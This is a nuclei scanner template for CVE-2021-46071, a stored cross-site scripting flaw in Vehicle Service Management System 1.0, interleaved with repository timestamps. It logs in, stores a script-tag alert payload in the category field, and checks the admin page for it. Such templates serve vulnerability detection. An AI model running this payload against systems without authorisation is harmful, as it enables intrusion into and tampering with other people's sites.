nuclei-templates/http/cves/2021/CVE-2021-46071.yaml

62 lines
2.6 KiB
YAML
Raw Normal View History

id: CVE-2021-46071
info:
name: ehicle Service Management System 1.0 - Cross-Site Scripting
author: TenBird
severity: medium
description: |
Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
2023-09-06 12:09:01 +00:00
remediation: |
To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
reference:
- https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
- https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-46071
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2021-46071
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00084
epss-percentile: 0.34831
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: vehicle_service_management_system_project
product: vehicle_service_management_system
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project
http:
- raw:
- |
POST /classes/Login.php?f=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{username}}&password={{password}}
- |
POST /classes/Master.php?f=save_category HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
- |
GET /admin/?page=maintenance/category HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
2023-07-11 19:49:27 +00:00
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(header_3, 'text/html')"
- "status_code_3 == 200"
- 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
condition: and
# digest: 490a0046304402203689cb6cc57186dbcb826dbab2fcc9fc6e9a875e79019b6098a67bc3c76cf393022049cce2da769d9c71050dfae4bf192726ad13c1a1e1103b5d2cfcced045920c99:922c64590222798bb761d5b6d8e72950